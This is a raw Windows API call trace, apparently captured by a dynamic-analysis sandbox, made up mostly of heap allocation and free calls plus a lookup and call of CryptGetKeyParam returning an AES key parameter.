RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0170.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0170.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0170.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0170.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0170.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0170.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0170.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0170.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0170.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0170.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0170.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0170.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0170.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0170.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0170.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0170.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0170.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0170.928] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0170.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0170.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0170.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0170.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0170.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0170.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0170.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0170.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0170.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0170.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0170.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0170.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0170.929] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0170.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0170.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd798 [0170.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0170.929] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0170.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0170.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0170.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0170.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0170.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0170.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0170.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0170.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0170.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0170.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0170.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0170.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0170.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0170.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0170.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0170.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0170.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0170.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0170.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0170.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0170.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0170.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0170.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0170.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0170.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0170.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0170.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0170.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0170.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0170.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0170.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0170.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0170.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0170.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0170.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0170.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0170.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0170.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0170.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0170.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0170.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0170.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0170.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0170.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0170.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0170.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0170.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0170.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0170.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0170.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0170.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0170.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0170.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0170.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0170.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0170.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0170.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0170.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0170.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0170.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0170.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0170.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0170.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0170.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0170.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0170.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0170.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0170.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0170.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0170.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0170.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0170.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0170.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0170.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0170.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0170.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0170.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0170.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0170.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0170.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0170.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0170.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0170.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0170.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0170.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0170.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0170.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0170.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0170.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0170.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0170.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0170.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0170.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0170.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0170.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0170.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0170.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0170.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0170.933] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0170.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0170.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0170.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0170.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0170.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0170.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0170.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0170.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0170.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0170.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0170.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0170.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0170.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0170.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0170.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0170.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0170.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0170.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0170.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0170.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0170.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0170.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0170.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0170.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0170.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0170.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0170.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0170.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0170.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0170.935] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0170.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0170.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0170.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0170.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0170.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0170.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0170.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0170.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0170.935] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c2718, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2718*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0170.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0170.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0170.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0170.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0170.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0170.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0170.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0170.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0170.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0170.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0170.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0170.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0170.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0170.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0170.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0170.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0170.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0170.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0170.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0170.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0170.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0170.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0170.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0170.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0170.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0170.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0170.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0170.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0170.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0170.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0170.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0170.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0170.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0170.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0170.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0170.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0170.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0170.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0170.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0170.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0170.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0170.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0170.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0170.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0170.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0170.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0170.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0170.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0170.937] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0170.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0170.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0170.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0170.938] 